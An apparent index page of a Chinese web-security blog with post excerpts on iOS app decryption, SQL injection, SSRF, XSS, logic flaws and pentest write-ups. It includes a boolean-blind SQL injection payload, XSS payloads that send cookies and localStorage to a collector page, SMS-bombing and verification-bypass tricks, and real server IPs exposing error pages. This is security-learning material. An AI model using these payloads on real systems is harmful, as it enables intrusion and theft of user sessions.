ios 客户端测试
参考链接
IOS苹果手机越狱+安装绕过签名插件+脱壳插件https://cn-sec.com/archives/1372576.html
iOS逆向之必要软件安装https://cloud.tencent.com/developer/article/1699832
1class-dump-z -H AppName/Payload/AppName.app/AppName -o storeheaders
记录sql注入的发现技巧
文章地址:https://www.freebuf.com/articles/web/338744.html
结论把 order_by=undefined 的参数值改为 order_by=asc 或者 order_by=desc,再在其他参数处注入。
payload:
123IF(substr(database (),1,1)='i',1,(select+1+union+select+2))因为此处是order by注入,这句payload翻译过来就是:如果数据库名字的第一个字母是i,就执行1,如果不是i,就执行select 1 union select 2,又因为这个语句返回的是两行数据,在语法规范上是错误的,导致整条语句都不执行,所以报错。这样就可根据返回码来区分,并进行快速爆破来判断出数据库名,类似于布尔盲注。
原因参数化会将参数值加上引号,但是order by字段不能带引号,所以很多排序功能常存在注入问题,如mybatis中预编译使用 #{} 而order by 字段使用参数化后有问题,所以开发者可能直接就使用 ${ ...
filter琐碎,bypass负能量,restart热爱
琐碎和负能量实习了六个月,从满怀激情到逐渐平淡,其中最难的是时间应该是初入社会的独居生活,不过所幸的是一直被工作推着走,和一个一直陪着我的人,没有太多时间去思考孤独等人生问题。
不过现在进入了工作的平淡期和感情挫折的双重打击,有了些迷茫,不知道工作的意义和提升技术的意义了,下班后回到小房间,漫无意义充满了我,对生活少了期待。
改变每次遇到低谷期,我总是依靠从说唱音乐中汲取力量来度过这段时光,这一次也不例外。
我听了幼稚园杀手的《生命如潮》,让我很感动,让我感受最深的一句歌词是“只有痛苦让我清醒”,一遍又一遍的循环,唯有戴着我的绿联T3耳机去听才最有感觉。
我想做出一些积极的改变,我开始去做一些有意义的事情。
去做一些锻炼,练到疲惫,在每晚入睡之前耗尽多巴胺,来让自己没有精力去想太多。
保留痛苦,时刻让自己清醒。
去广州最繁华的地方,看众生百态。
听朋友讲他的pc故事,一笑而过。
看梅西任意球绝杀比赛,为他而高兴。
日常看拷打阿伟罗的视频。
和年轻的灵魂交流,保持心灵的年轻。
在地铁上看技术文章,学习getshell新姿势。
不断探索奇妙而新奇的事。
最后重新唤起自己对网络安全的热爱,所 ...
js逆向之远程调用(rpc)免去抠代码补环境
过程:在调用加密函数前面插入以下代码
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596Hlclient.prototype.connect = function () { console.log('begin of connect to wsURL: ' + this.wsURL); var _this = this; try { this.socket["ySocket"] = new WebSocket(this.wsURL); ...
转载|WEB非实用之SSRF的挖掘与利用
通过接口管理写一个python代理来访问目标内网,思路非常棒。
https://www.yuque.com/pmiaowu/bomi9w/mbs0gw
WEB非实用之SSRF的挖掘与利用0x01 前言SSRF (Server-Side Request Forgery:服务器端请求伪造)
是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞
原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制
本文讲解一个ssrf的挖掘方法与一个全回显ssrf的利用方法
0x02 漏洞危害1231. 前期渗透时,利用目标ssrf扫描内网存活主机或端口2. 如果站点是php的利用Gopher协议,去尝试攻击内网3. 搭建代理
0x03 漏洞局限性121. 大部分情况下都是GET型ssrf漏洞,仅能探测存活,扫描端口、内网域名探测,危害十分有限2. https请求ssl证书无法正常解析
0x04 漏洞分类12345ssrf的类型现在通常分为:1. 可回显型2. 非回显型在实战中,非回显型的ssrf用处属实不大,也就不详讲了
0x05 例子0x05.1 例子 ...
无题
1、tomcat报错页面
http://121.33.234.188:8888/1111111
2、nginx报错页面
http://47.110.224.48/fffffffff
3、ThinkPHP 报错页面
https://112.74.162.243/ddddddddddddd
4、django debug模式
You’re seeing this error because you have DEBUG = True
一次对企业内部EHR系统的渗透测试
转载|一次对企业内部EHR系统的渗透测试
转载自:https://xz.aliyun.com/t/11943
作者:icepaper
文章精华:python 脚本提取 webpack js 文件里面的接口,
1、渗透前言对EHR系统访问时,首先是需要一个登录的,作为企业员工,大部分系统接入了SSO,该EHR系统为了保证安全性也不例外。因此对该系统的渗透测试基础的前提是————在该系统拥有一个可登录的凭据,但是该凭据并未拥有任何权限。
如下所示,正常的企业员工登录该系统时都是没有访问权限的。
那么对该类系统对其渗透的第一步必定是打开F12观察JS,发现JS目录下仅有6个JS文件
而右击源代码查看的JS里却有几十个chun-xxxxxx.js
随便打开了一个chunk-xxxxxx.js,利用插件发现存在一些路径但是在F12里搜不到,也就意味着这么多个chunk我要一个个打开看,才能够测试得比较仔细。 如下所示:
2、packerFuzzer接口太多了用了,先使用一下packerFuzzer来看看是否有未授权访问
很轻松的收获了两枚任意文件上传漏洞,不过其中一个是放 ...
记一次某集团的互联网资产梳理过程
前言从183个子域名出发,对某企业进行互联网资产暴露面进行测绘,成果输出一份总结报告,一份可登录后台记录表,一份包含子域名、web站点及IP端口的表,一份敏感信息收集报告。
思路1、从183个子域名中提取出使用了真实IP的子域名、无效子域名、cdn+yunwaf子域名等三种格式的子域名
使用的是自己编写的工具,可用快速提取出使用了真实IP的子域名,这点很重要,因为例如OneForAll的子域名收集结果中关于cdn的判断结果十分不准确。
https://github.com/ccc-f/FCDN
2、批量反差子域名ip,代码demo如下:
123456789import socketdef domain2Ip(domain): ip_list = [] items = socket.getaddrinfo(domain, None) for ip in items: if ip[4][0] not in ip_list: ip_list.append(ip[4][0]) return ip_listdomain2Ip(' ...
XSS 注入大全
xss payload 大全,学习如何用 xss 做到更多
转载自:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
跨 站点 脚本跨站 脚本 ( XSS ) 是 一 种 计算机 安全 漏洞 , 通常 存在 于 Web 应用 程序 中 。 XSS 使 攻击 者 能够 将 客户 端 脚本 插入 其他 用户 查看 的 网页 中 。
总结[TOC]
漏洞 利用 代码 或 POCXSS 的 数据 抓取 器获取管理员Cookie或敏感访问令牌时,以下负载会将其发送到受控页。
1234<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script><script>document.location='http://localhost/XSS/grabber.php?c='+localStora ...
逻辑漏洞总结
逻辑漏洞总结0x00 漏洞介绍业务逻辑漏洞是指由于程序逻辑不严谨或逻辑太复杂,导致一些逻辑分支不能正常处理或处理错误。
0x01 常见场景
0x02 漏洞场景1. 验证码爆破有些系统,手机获取验证码的时候,没有对验证码的验证次数进行限制,或者是没有对验证码的有限时间进行限制,就会造成验证码爆破。
四位验证码十分钟之内可以轻松爆破,六位建议放弃。
2. 凭证返回凭证返回即,手机号码登录某系统,抓包,返回的相应包的set-Cookie字段或其他字段里面直接返回了验证码,我们可以直接输入该验证码,成功登录绕过。
3. 验证绕过这招之前没想到,很实用
不只是验证码,在某些密码找回,或者验证用户凭证的时候,会根据返回的状态码进行校验,假设验证码是正确的,返回的状态码位200,错为500,这里我们就可以通过抓取响应包,修改状态码为200,即可达到验证绕过。
又学会了一招——抓响应包
抓响应包:在Burp里面的Do intercept -> Response to this request。
4. 短信轰炸不多比比,直接上burp。
5. session覆盖也是没想过的一招,很厉害的一个思 ...